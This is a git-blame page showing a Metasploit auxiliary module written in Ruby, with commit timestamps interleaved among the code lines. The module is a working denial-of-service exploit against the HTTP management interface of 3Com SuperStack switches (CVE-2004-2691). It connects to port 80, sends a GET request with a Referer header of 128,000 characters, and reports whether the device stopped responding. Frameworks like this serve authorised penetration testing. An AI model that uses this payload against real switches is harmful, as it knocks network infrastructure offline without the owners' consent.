Files
metasploit-gs/modules/auxiliary/dos/http/3com_superstack_switch.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

59 lines
1.8 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(
update_info(
info,
'Name' => '3Com SuperStack Switch Denial of Service',
'Description' => %q{
This module causes a temporary denial of service condition
against 3Com SuperStack switches. By sending excessive data
to the HTTP Management interface, the switch stops responding
temporarily. The device does not reset. Tested successfully
against a 3300SM firmware v2.66. Reported to affect versions
prior to v2.72.
},
'Author' => [ 'aushack' ],
'License' => MSF_LICENSE,
'References' => [
2017-11-09 03:00:24 +11:00
# aushack - I am not sure if these are correct, but the closest match!
[ 'OSVDB', '7246' ],
[ 'CVE', '2004-2691' ],
[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
],
'DisclosureDate' => '2004-06-24',
'Notes' => {
'Stability' => [CRASH_SERVICE_DOWN],
'SideEffects' => [],
'Reliability' => []
}
)
)
2013-08-30 16:28:54 -05:00
register_options([ Opt::RPORT(80) ])
end
2013-08-30 16:28:54 -05:00
def run
connect
print_status("Sending DoS packet to #{rhost}:#{rport}")
2013-08-30 16:28:54 -05:00
sploit = "GET / HTTP/1.0\r\n"
sploit << 'Referer: ' + Rex::Text.rand_text_alpha(1) * 128000
2013-08-30 16:28:54 -05:00
sock.put(sploit + "\r\n\r\n")
disconnect
print_error('DoS packet unsuccessful')
rescue ::Rex::ConnectionRefused
print_error("Unable to connect to #{rhost}:#{rport}")
rescue ::Errno::ECONNRESET
print_good("DoS packet successful. #{rhost} not responding.")
end
end